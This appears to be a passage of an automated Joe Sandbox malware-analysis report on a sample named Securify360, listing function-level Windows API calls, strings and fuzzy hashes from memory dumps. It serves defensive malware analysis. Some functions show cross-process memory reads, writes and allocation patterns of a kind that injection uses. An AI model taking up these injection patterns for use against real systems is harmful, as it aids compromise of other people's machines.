                                                                                              • Instruction Fuzzy Hash: 6BF04F35600304AFEB311FA59CC9EA73BADEF897A4F204525F989C6194CB669C41EB60
                                                                                              APIs
                                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00FE8D3F
                                                                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00FE8D49
                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FE8D58
                                                                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00FE8D5F
                                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FE8D75
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                              • String ID:
                                                                                              • API String ID: 44706859-0
                                                                                              • Opcode ID: cf2aca22bd8370d0e3bac0be19580fe42dde2dfcabbed8fe31746d9f00b64cad
                                                                                              • Instruction ID: e16aa1704a8cacfabda5f2151d8d1b6aecd5d02d34259a68420c39ca8b1267f8
                                                                                              • Opcode Fuzzy Hash: cf2aca22bd8370d0e3bac0be19580fe42dde2dfcabbed8fe31746d9f00b64cad
                                                                                              • Instruction Fuzzy Hash: DEF0AF30200344AFEB311FA5EC88E673BACEF497A4F240115F988C2284CB669D41EB60
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00FECD90
                                                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 00FECDA7
                                                                                              • MessageBeep.USER32(00000000), ref: 00FECDBF
                                                                                              • KillTimer.USER32(?,0000040A), ref: 00FECDDB
                                                                                              • EndDialog.USER32(?,00000001), ref: 00FECDF5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3741023627-0
                                                                                              • Opcode ID: d0e3882f3dadc7d711083ccd7e416dde5d99fab2ca0f169f3f247a83d601c30e
                                                                                              • Instruction ID: 000a1e6fc659a46b84557c33fd4f0ec9f3cf31014ea7497bfaa7f1beadbdde01
                                                                                              • Opcode Fuzzy Hash: d0e3882f3dadc7d711083ccd7e416dde5d99fab2ca0f169f3f247a83d601c30e
                                                                                              • Instruction Fuzzy Hash: 1C01D131900748ABEB305F21DC4EFA67BB8FB04711F100669F6D2A10D5DBFAA9499BC1
                                                                                              APIs
                                                                                              • EndPath.GDI32(?), ref: 00F9179B
                                                                                              • StrokeAndFillPath.GDI32(?,?,00FCBBC9,00000000,?), ref: 00F917B7
                                                                                              • SelectObject.GDI32(?,00000000), ref: 00F917CA
                                                                                              • DeleteObject.GDI32 ref: 00F917DD
                                                                                              • StrokePath.GDI32(?), ref: 00F917F8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                              • String ID:
                                                                                              • API String ID: 2625713937-0
                                                                                              • Opcode ID: fdb5b80727568b3c69574aae76bbf831b60424846963ee8f8abca9b1281e597b
                                                                                              • Instruction ID: e0277cfb8d8367eb9e1191beb7df6ea9c8eee39d049c9658bd6d912798fb950b
                                                                                              • Opcode Fuzzy Hash: fdb5b80727568b3c69574aae76bbf831b60424846963ee8f8abca9b1281e597b
                                                                                              • Instruction Fuzzy Hash: B5F0EC3004430AEBFB355F66E84C76A3FA4F710326F648224F4AA552E8C73E4995EF11
                                                                                              APIs
                                                                                              • CoInitialize.OLE32(00000000), ref: 00FFCA75
                                                                                              • CoCreateInstance.OLE32(01023D3C,00000000,00000001,01023BAC,?), ref: 00FFCA8D
                                                                                                • Part of subcall function 00FA1A36: _memmove.LIBCMT ref: 00FA1A77
                                                                                              • CoUninitialize.OLE32 ref: 00FFCCFA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                              • String ID: .lnk
                                                                                              • API String ID: 2683427295-24824748
                                                                                              • Opcode ID: be5bcbf9e1f28c60cf167844daec3c8a318b79209a2e40c9c5a078ee94dbb19c
                                                                                              • Instruction ID: 353070919dfffaf78eb5700663f19492d6bc7242e7a41f81a4fd47c4c58372d6
                                                                                              • Opcode Fuzzy Hash: be5bcbf9e1f28c60cf167844daec3c8a318b79209a2e40c9c5a078ee94dbb19c
                                                                                              • Instruction Fuzzy Hash: 86A13DB1104205AFE700EF64CC81EABB7E8FF95718F00491DF59597192EB74EA0ADB92
                                                                                              APIs
                                                                                                • Part of subcall function 00FB0FE6: std::exception::exception.LIBCMT ref: 00FB101C
                                                                                                • Part of subcall function 00FB0FE6: __CxxThrowException@8.LIBCMT ref: 00FB1031
                                                                                                • Part of subcall function 00FA1A36: _memmove.LIBCMT ref: 00FA1A77
                                                                                                • Part of subcall function 00FA1680: _memmove.LIBCMT ref: 00FA16DB
                                                                                              • __swprintf.LIBCMT ref: 00F9E598
                                                                                              Strings
                                                                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00F9E431
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                              • API String ID: 1943609520-557222456
                                                                                              • Opcode ID: 319420884041362986cfc132ab679e61a3cbd5e67ebe1a2635687c2a3ee8dc3f
                                                                                              • Instruction ID: 280bfeb34377a74c0e0ffb8a9507dfaad9b1e6ae3b29afc9da40668806f066c3
                                                                                              • Opcode Fuzzy Hash: 319420884041362986cfc132ab679e61a3cbd5e67ebe1a2635687c2a3ee8dc3f
                                                                                              • Instruction Fuzzy Hash: 4B91BE715082019FDB14EF24CC95C6FB7A8FF96710F45491EF486972A1EB24ED04EB92
                                                                                              APIs
                                                                                              • __startOneArgErrorHandling.LIBCMT ref: 00FB52CD
                                                                                                • Part of subcall function 00FC0320: __87except.LIBCMT ref: 00FC035B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorHandling__87except__start
                                                                                              • String ID: pow
                                                                                              • API String ID: 2905807303-2276729525
                                                                                              • Opcode ID: a696a5794661c18963be0e81a94dbc36dd94e359f6a885ddf17aeeb6cf33c3a8
                                                                                              • Instruction ID: 93c956264aeaba2142272428ae0d18d3ff55e962fa9e9f86f4785e064ea8bfb4
                                                                                              • Opcode Fuzzy Hash: a696a5794661c18963be0e81a94dbc36dd94e359f6a885ddf17aeeb6cf33c3a8
                                                                                              • Instruction Fuzzy Hash: 06517F31E09607C6CB25BA15CA02BAB37D09B00B60F34892DE1C1462D9EF7D8CC5BF41
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: #$+
                                                                                              • API String ID: 0-2552117581
                                                                                              • Opcode ID: a9a375de72f467b565de2cda09d1135a03722c235b7b32cac2b1837cb3ee8ac9
                                                                                              • Instruction ID: 3b57659add8e6d4bc50b81b8ccebd3aeac1f0f8da3d817796418e02e798bd890
                                                                                              • Opcode Fuzzy Hash: a9a375de72f467b565de2cda09d1135a03722c235b7b32cac2b1837cb3ee8ac9
                                                                                              • Instruction Fuzzy Hash: 8E511575900299CFDF25DF6AC844AFA7BA4FF65320F244055F891DB290DB34AE42EB60
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memset$_memmove
                                                                                              • String ID: ERCP
                                                                                              • API String ID: 2532777613-1384759551
                                                                                              • Opcode ID: 27838ed9f04455cf11dafb1d12b099d692cf2a9c73aa7b86203d6d86ae0515c2
                                                                                              • Instruction ID: bd6358e841c2af813401ec36389ada0404e07f840dcea068cad6205f10ffd26f
                                                                                              • Opcode Fuzzy Hash: 27838ed9f04455cf11dafb1d12b099d692cf2a9c73aa7b86203d6d86ae0515c2
                                                                                              • Instruction Fuzzy Hash: 2D51C1B2D007059FDB24DF65C881BAABBF4FF05324F24856EE44ACB250E7349585DB90
                                                                                              APIs
                                                                                                • Part of subcall function 00FF1CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00FE9E4E,?,?,00000034,00000800,?,00000034), ref: 00FF1CE5
                                                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00FEA3F7
                                                                                                • Part of subcall function 00FF1C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00FE9E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00FF1CB0
                                                                                                • Part of subcall function 00FF1BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00FF1C08
                                                                                                • Part of subcall function 00FF1BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00FE9E12,00000034,?,?,00001004,00000000,00000000), ref: 00FF1C18
                                                                                                • Part of subcall function 00FF1BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00FE9E12,00000034,?,?,00001004,00000000,00000000), ref: 00FF1C2E
                                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00FEA464
                                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00FEA4B1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                              • String ID: @
                                                                                              • API String ID: 4150878124-2766056989
                                                                                              • Opcode ID: 5ce7d4a9dc2f71b063e2018bce01766c4fae7f2c09f5b0a8bbe1a97a2ba91c72
                                                                                              • Instruction ID: b65a0a1bf116c0ee6d5bc68d2f177adbf277f5c73c6c73d1528828ff09ace938
                                                                                              • Opcode Fuzzy Hash: 5ce7d4a9dc2f71b063e2018bce01766c4fae7f2c09f5b0a8bbe1a97a2ba91c72
                                                                                              • Instruction Fuzzy Hash: C5415D7290021CBFCB20DFA4CC85AEEB7B8EF49310F104095FA55B7190DA756E45DBA1
                                                                                              APIs
                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,01020980,00000000,?,?,?,?), ref: 01018004
                                                                                              • GetWindowLongW.USER32 ref: 01018021
                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 01018031
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Long
                                                                                              • String ID: SysTreeView32
                                                                                              • API String ID: 847901565-1698111956
                                                                                              • Opcode ID: 039f1e169c5dc6f1ca3bcf49fd0b317b31e6eceb7a51157e9a5829b20a0a20a4
                                                                                              • Instruction ID: f129b6e5f693411070260415beebe04486bc69b3c8b52b401ecf1dfe5ad1dac3
                                                                                              • Opcode Fuzzy Hash: 039f1e169c5dc6f1ca3bcf49fd0b317b31e6eceb7a51157e9a5829b20a0a20a4
                                                                                              • Instruction Fuzzy Hash: 6831C531200209AFEFA58E38CC45BEB7BA9FF45324F244319F9B5931D5D739A9509750
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 01017A86
                                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 01017A9A
                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 01017ABE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window
                                                                                              • String ID: SysMonthCal32
                                                                                              • API String ID: 2326795674-1439706946
                                                                                              • Opcode ID: b82bbe26a1fe8beaaf521a29cb5bdf437353630ea31b55e6f2e5983c2069f93b
                                                                                              • Instruction ID: 4ee6d674775f6eb8a33ad50ed416e69a32638bd824bc5c0e5c5a93ff7d7b885a
                                                                                              • Opcode Fuzzy Hash: b82bbe26a1fe8beaaf521a29cb5bdf437353630ea31b55e6f2e5983c2069f93b
                                                                                              • Instruction Fuzzy Hash: 5621D333640218BFDF258E94CC42FEA3BA9EF88714F110154FE546B195DA79A950DB90
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0101826F
                                                                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0101827D
                                                                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01018284
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$DestroyWindow
                                                                                              • String ID: msctls_updown32
                                                                                              • API String ID: 4014797782-2298589950
                                                                                              • Opcode ID: 499f17c2a4613a6c253545fd7206485f616cc56c440d5d852b0f5d084e5ce78b
                                                                                              • Instruction ID: 5ef2f92bb35398151cd56903f3d5be2a5748a2aa2fea1238230be90821bb0447
                                                                                              • Opcode Fuzzy Hash: 499f17c2a4613a6c253545fd7206485f616cc56c440d5d852b0f5d084e5ce78b
                                                                                              • Instruction Fuzzy Hash: 0221AEB5600209AFEB61DF58CC81DB737EDEB4A354B044099FA409B356CB35EC11DBA0
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 01017360
                                                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 01017370
                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 01017395
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$MoveWindow
                                                                                              • String ID: Listbox
                                                                                              • API String ID: 3315199576-2633736733
                                                                                              • Opcode ID: 433521fb1587a466362338f7633c587c82d78121971930bb3a4d54225fb4bcbb
                                                                                              • Instruction ID: b27deb8fe012932a1d0e240e0c341d4918c388dd593036886e25ba9134f5925d
                                                                                              • Opcode Fuzzy Hash: 433521fb1587a466362338f7633c587c82d78121971930bb3a4d54225fb4bcbb
                                                                                              • Instruction Fuzzy Hash: 7121F232600208BFEF228F58CC85EBF37AAEB89750F10C124FA809B194C6759C518BA0
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 01017D97
                                                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 01017DAC
                                                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 01017DB9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID: msctls_trackbar32
                                                                                              • API String ID: 3850602802-1010561917
                                                                                              • Opcode ID: 3ec401d200243d33401f2b129924fbedca748a2ccc472c8889df444ef5b574e0
                                                                                              • Instruction ID: 4187b25a0c92ec8b8ba7e70ca1303df87d3991debc34bb8251f51cdd0131685a
                                                                                              • Opcode Fuzzy Hash: 3ec401d200243d33401f2b129924fbedca748a2ccc472c8889df444ef5b574e0
                                                                                              • Instruction Fuzzy Hash: 8111E37224020CBBEF25AE64CC45FEB7BA9EF89B14F11411CFA81A6091D676A451DB20
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00FD027A,?), ref: 0100C6E7
                                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0100C6F9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                              • API String ID: 2574300362-1816364905
                                                                                              • Opcode ID: 8a4c36568863957040c038beac1806f97c1e6bc8e47e0dbbbd053e444ffcfb24
                                                                                              • Instruction ID: 8279968d91017f680569043b6c2fdfad66cd48ec32aaa4f4bbec57db795b2a0e
                                                                                              • Opcode Fuzzy Hash: 8a4c36568863957040c038beac1806f97c1e6bc8e47e0dbbbd053e444ffcfb24
                                                                                              • Instruction Fuzzy Hash: 00E08C78200312CBF7324E2AC949A4276D4BB04704F7084ADE8C9C2245D774C440CB10
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00FA4AF7,?), ref: 00FA4BB8
                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00FA4BCA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
